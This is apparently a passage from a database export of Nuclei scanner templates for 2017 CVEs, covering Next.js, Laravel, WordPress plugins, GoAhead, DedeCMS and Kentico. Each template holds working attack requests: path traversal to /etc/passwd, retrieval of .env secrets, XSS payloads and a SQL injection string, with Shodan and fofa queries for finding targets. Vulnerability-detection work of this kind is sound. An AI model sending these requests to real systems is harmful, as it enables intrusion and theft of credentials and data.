https://github.com/zeit/next.js/releases/tag/2.4.1\n - https://nvd.nist.gov/vuln/detail/CVE-2017-16877\n - https://github.com/vercel/next.js/commit/02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-16877\n cwe-id: CWE-22\n epss-score: 0.00337\n epss-percentile: 0.68302\n cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zeit\n product: next.js\n tags: cve,cve2017,nextjs,lfi,traversal,zeit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_next/../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c250b9c908590d5296d8fd48225795617103cff1b0a0082f49eccc4317ef7c2e022100f718c49e8cd4c13a059b632b35040a5391bb6a6714822a1348371aa8b2d51137:922c64590222798bb761d5b6d8e72950", "hash": "b42737d33864d079ee8711a5366af3ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd2" }, "name": "CVE-2017-16894.yaml", "content": "id: CVE-2017-16894\n\ninfo:\n name: Laravel <5.5.21 - Information Disclosure\n author: j4vaovo\n severity: high\n description: |\n Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the application.\n remediation: |\n Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894\n - https://packetstormsecurity.com/files/cve/CVE-2017-16894\n - http://whiteboyz.xyz/laravel-env-file-vuln.html\n - https://twitter.com/finnwea/status/967709791442341888\n - https://nvd.nist.gov/vuln/detail/CVE-2017-16894\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-16894\n cwe-id: CWE-200\n epss-score: 0.11608\n epss-percentile: 0.95145\n cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: laravel\n product: laravel\n shodan-query: Laravel-Framework\n fofa-query: app=\"Laravel-Framework\"\n tags: cve,cve2017,laravel,exposure,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.env\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"APP_NAME=\"\n - \"APP_DEBUG=\"\n - \"DB_PASSWORD=\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a541924b65a67b00842f8a25418a80364b6d61f929707787057785e26f98d3b002205403d069324b4a48da8c6cba4b38fc4d1c04a8a1510526608e59a4bcab70e57e:922c64590222798bb761d5b6d8e72950", "hash": "2cef520c96106fe9592471370f4d5bb4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd3" }, "name": "CVE-2017-17043.yaml", "content": "id: CVE-2017-17043\n\ninfo:\n name: WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter \"post\" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.\n impact: |\n Successful exploitation of this vulnerability could lead to the theft of sensitive information, session hijacking, or the execution of arbitrary code in the context of the affected user.\n remediation: |\n Update to the latest version of the WordPress Emag Marketplace Connector plugin (1.1) or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/\n - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt\n - https://wpvulndb.com/vulnerabilities/8964\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17043\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-17043\n cwe-id: CWE-79\n epss-score: 0.00245\n epss-percentile: 0.63923\n cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: zitec\n product: emag_marketplace_connector\n framework: wordpress\n tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/emag-marketplace-connector/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203013773f07b32293d187ef5593c809c0d5b199d0535add43a30b9558d54ad34b0220793cad7ec1c8c9661bbcec6319fcac9cd92006ed78d1f46ccc76dca5de51cb18:922c64590222798bb761d5b6d8e72950", "hash": "267053a9ae579ff4fd7fb002d2387b7c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd4" }, "name": "CVE-2017-17059.yaml", "content": "id: CVE-2017-17059\n\ninfo:\n name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.\n remediation: |\n Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.\n reference:\n - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1\n - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17059\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-17059\n cwe-id: CWE-79\n epss-score: 0.00261\n epss-percentile: 0.63794\n cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: amtythumb_project\n product: amtythumb\n framework: wordpress\n tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Amty Thumb'\n - 'Tags:'\n condition: and\n case-insensitive: true\n\n - method: POST\n path:\n - \"{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1\"\n\n body: \"amty_hidden=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022074f0b24a9cb480e81960e319cc7ee19b77dec9226fe67fb84ef549e875531ccb022100d2da121efbde5f1678796a09a5a402923ee1a4b01df208e0d978251d20b71f1b:922c64590222798bb761d5b6d8e72950", "hash": "24f06dad7e145d49f629fffb69bef0f9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd5" }, "name": "CVE-2017-17451.yaml", "content": "id: CVE-2017-17451\n\ninfo:\n name: WordPress Mailster <=1.5.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability.\n reference:\n - https://wordpress.org/plugins/wp-mailster/#developers\n - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html\n - https://wpvulndb.com/vulnerabilities/8973\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17451\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-17451\n cwe-id: CWE-79\n epss-score: 0.00178\n epss-percentile: 0.55144\n cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpmailster\n product: wp_mailster\n framework: wordpress\n tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP Mailster ='\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ec046f9a81c101fb374ae81bf7e992adeec3cc8e98a3583295368cde81c2129e022100a1232b8f02f87a0a260815390cb7e841d202487f1b339d81ed1212cc8af179de:922c64590222798bb761d5b6d8e72950", "hash": "7bdbec49ee9f0467d0761d8613970a8c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd6" }, "name": "CVE-2017-17562.yaml", "content": "id: CVE-2017-17562\n\ninfo:\n name: Embedthis GoAhead <3.6.5 - Remote Code Execution\n author: geeknik\n severity: high\n description: |\n description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability.\n reference:\n - https://www.elttam.com/blog/goahead/\n - https://github.com/ivanitlearning/CVE-2017-17562\n - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562\n - https://github.com/embedthis/goahead/issues/249\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17562\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-17562\n cwe-id: CWE-20\n epss-score: 0.97436\n epss-percentile: 0.9994\n cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:*\n metadata:\n max-request: 65\n vendor: embedthis\n product: goahead\n tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n payloads:\n endpoint:\n - admin\n - apply\n - non-CA-rev\n - cgitest\n - checkCookie\n - check_user\n - chn/liveView\n - cht/liveView\n - cnswebserver\n - config\n - configure/set_link_neg\n - configure/swports_adjust\n - eng/liveView\n - firmware\n - getCheckCode\n - get_status\n - getmac\n - getparam\n - guest/Login\n - home\n - htmlmgr\n - index\n - index/login\n - jscript\n - kvm\n - liveView\n - login\n - login.asp\n - login/login\n - login/login-page\n - login_mgr\n - luci\n - main\n - main-cgi\n - manage/login\n - menu\n - mlogin\n - netbinary\n - nobody/Captcha\n - nobody/VerifyCode\n - normal_userLogin\n - otgw\n - page\n - rulectl\n - service\n - set_new_config\n - sl_webviewer\n - ssi\n - status\n - sysconf\n - systemutil\n - t/out\n - top\n - unauth\n - upload\n - variable\n - wanstatu\n - webcm\n - webmain\n - webproc\n - webscr\n - webviewLogin\n - webviewLogin_m64\n - webviewer\n - welcome\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"environment variable\"\n - \"display library search paths\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 480a004530430220137571f29820e7cfeff24983e553083fbd48df32ed6c9f6be7ab7a0b2ab3dcec021f1cf2aba6f6d18369d6d6d6784a620d36863b9446b26c941818edd6a6a12322:922c64590222798bb761d5b6d8e72950", "hash": "65c968e53b51e06110b459a04a9a4131", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd7" }, "name": "CVE-2017-17731.yaml", "content": "id: CVE-2017-17731\n\ninfo:\n name: DedeCMS 5.7 - SQL Injection\n author: j4vaovo\n severity: critical\n description: |\n DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17731\n - https://blog.csdn.net/nixawk/article/details/24982851\n - https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-17731\n cwe-id: CWE-89\n epss-score: 0.02129\n epss-percentile: 0.88972\n cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dedecms\n product: dedecms\n shodan-query: http.html:\"DedeCms\"\n fofa-query: app=\"DedeCMS\"\n tags: cve,cve2017,sqli,dedecms\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ba551e3088d97f8d462ef4b105c0dc9c4bc6cef870e1e5898d660c13360a9c79022068cf574ec431237b66a83d1398a8b348cbcf96e48a36b441e77089f600452268:922c64590222798bb761d5b6d8e72950", "hash": "f3cdd8b5524975c6d7083349c8658fbc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd8" }, "name": "CVE-2017-17736.yaml", "content": "id: CVE-2017-17736\n\ninfo:\n name: Kentico - Installer Privilege Escalation\n author: shiar\n severity: critical\n description: |\n Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.\n impact: |\n An attacker can gain administrative privileges on the Kentico CMS system.\n remediation: |\n Upgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability.\n reference:\n - https://www.exploit-db.com/ghdb/5694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17736\n - https://blog.hivint.com/advisory-access-control-bypass-in-kentico-cms-cve-2017-17736-49e1e43ae55b\n - https://github.com/0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-17736\n cwe-id: CWE-425\n epss-score: 0.1483\n epss-percentile: 0.95656\n cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: kentico\n product: kentico_cms\n google-query: intitle:\"kentico database setup\"\n tags: cve2017,cve,kentico,cms,install,unauth,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/CMSInstall/install.aspx\"\n\n matchers-condition: or\n matchers:\n - type: word\n words:\n - \"Kentico\"\n - \"Database Setup\"\n - \"SQLServer\"\n condition: and\n\n - type: word\n words:\n - \"Database Setup\"\n - \"SQLServer\"\n condition: and\n# digest: 4a0a00473045022100ad66c367e331e508a9f4b8fa4a02f983e9f099aeadd13065ad5c5afce55ef49c022066cea12a22089ef4211b14cd43c45a6ee5a3d7ba24ae488ba1f0f9d108f68fcc:922c64590222798bb761d5b6d8e72950", "hash": "40b9028e47d2624536a524d2cd442a46", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd9" }, "name": "CVE-2017-18024.yaml", "content": "id: CVE-2017-18024\n\ninfo:\n name: AvantFAX 3.3.3 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://hackerone.com/reports/963798\n - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18024\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/NarbehJackson/Java-Xss-minitwit16\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18024\n cwe-id: CWE-79\n epss-score: 0.00074\n epss-percentile: 0.30209\n cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: avantfax\n product: avantfax\n tags: cve,cve2017,avantfax,hackerone,packetstorm,xss\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'AvantFAX'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e15727b0ddf652065861bf22bea1c0e93ae8134932a63f1691a2256adbd1b25602201f24ab36ca2f64094ec81fa3f92890da072058fd9f23c5802569ecd06afcb00c:922c64590222798bb761d5b6d8e72950", "hash": "ec04f43243ec2b3090adf432ff13d9a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fda" }, "name": "CVE-2017-18487.yaml", "content": "id: CVE-2017-18487\n\ninfo:\n name: AdPush < 1.44 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18487\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18487\n - https://wordpress.org/plugins/adsense-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18487\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: google_adsense_project\n product: google_adsense\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/adsense-plugin/\"\n tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Google AdSense\")'\n condition: and\n# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950", "hash": "8caf1282fa5b82a33913f9e97e13d7b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdb" }, "name": "CVE-2017-18490.yaml", "content": "id: CVE-2017-18490\n\ninfo:\n name: Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The contact-form-multi plugin before 1.2.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18490\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18490\n - https://wordpress.org/plugins/contact-form-multi/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18490\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: contact_form_multi\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contact-form-multi/\"\n tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Contact Form Multi by\")'\n condition: and\n# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950", "hash": "8712edd2b1a8d2b4f09052d96c0d727c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdc" }, "name": "CVE-2017-18491.yaml", "content": "id: CVE-2017-18491\n\ninfo:\n name: Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The contact-form-plugin plugin before 4.0.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18491\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18491\n - https://wordpress.org/plugins/contact-form-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18491\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: contact_form\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contact-form-plugin/\"\n tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Contact Form by\")'\n condition: and\n# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950", "hash": "3f6cb3f87145a0e406813a42715f1707", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdd" }, "name": "CVE-2017-18492.yaml", "content": "id: CVE-2017-18492\n\ninfo:\n name: Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18492\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18492\n - https://wordpress.org/plugins/contact-form-to-db/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18492\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: contact_form_to_db\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contact-form-to-db/\"\n tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Contact Form to DB by\")'\n condition: and\n# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950", "hash": "4449f67a8a71da46a44c63fa6df6dbf4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fde" }, "name": "CVE-2017-18493.yaml", "content": "id: CVE-2017-18493\n\ninfo:\n name: Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18493\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18493\n - 